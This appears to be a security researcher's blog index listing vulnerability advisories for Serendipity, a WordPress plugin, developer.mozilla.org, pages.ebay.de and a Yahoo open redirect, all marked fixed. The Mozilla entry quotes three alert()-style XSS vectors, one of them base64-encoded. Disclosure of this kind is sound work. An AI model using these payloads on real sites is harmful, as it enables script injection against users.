Advisory:
Serendipity 1.7.5 (Backend) – Multiple security vulnerabilities
Advisory ID:
SSCHADV2014-003
Author:
Stefan Schurtz
Affected Software:
Successfully tested on Serendipity 1.7.5
Vendor URL :
Vendor Status:
fixed
======================
Vulnerability Description
======================
The Serendipity 1.7.5 backend is prone to multiple security vulnerabilities.
Posted by on Saturday, January 11. 2014
In Dec ’13 I reported an Open Redirect (and two other vulnerabilities, first in Nov ’13) to the Yahoo Bug Bounty Program. Sadly, I’ve got no response or feedback for any of these issues, so I wrote a new message to them (this time via email).
Last week they told me that open redirects are no longer in scope of the bug bounty program :-/
So here is my advisory for this issue:
Continue reading "Yahoo Bug Bounty Program Vulnerability #2 Open Redirect"
Advisory:
WordPress Plugin WP-Members 2.8.9 – Multiple Cross-site Scripting vulnerabilities
Advisory ID:
SSCHADV2014-001
Author:
Stefan Schurtz
Affected Software:
Successfully tested on WP-Members Version 2.8.9
Vendor URL :
Vendor Status:
fixed
======================
Vulnerability Description
======================
The WordPress plugin "WP-Members 2.8.9" is prone to reflected and stored XSS vulnerabilities.
Posted by on Sunday, December 8. 2013
Advisory:
developer.mozilla.org - DOM based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-010
Author:
Stefan Schurtz
Affected Software:
Successfully tested on developer.mozilla.org
Vendor URL:
Vendor Status:
fixed
==========================
Vulnerability Description
==========================
The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability.
Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.
For example:
XSS via formaction – requiring user interaction (1)
A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Self-including DOM Worker XSS
A self-including code snippet utilizing a DOM worker and firing a message event to itself causing script execution
0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))
Self-hijacking JSON literals
In case parts of a JSON literal are controlled by user input, there’s a risk to allow auto-harvesting values from later object members.
<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>
Advisory:
pages.ebay.de – DOM based Cross-site Scripting vulnerability
Advisory ID:
SSCHADV2013-011
Author:
Stefan Schurtz
Affected Software:
Successfully tested on pages.ebay.de
Vendor URL :
Vendor Status:
fixed
======================
Vulnerability Description
======================
The website ‘pages.ebay.de’ is prone to a DOM based XSS vulnerability.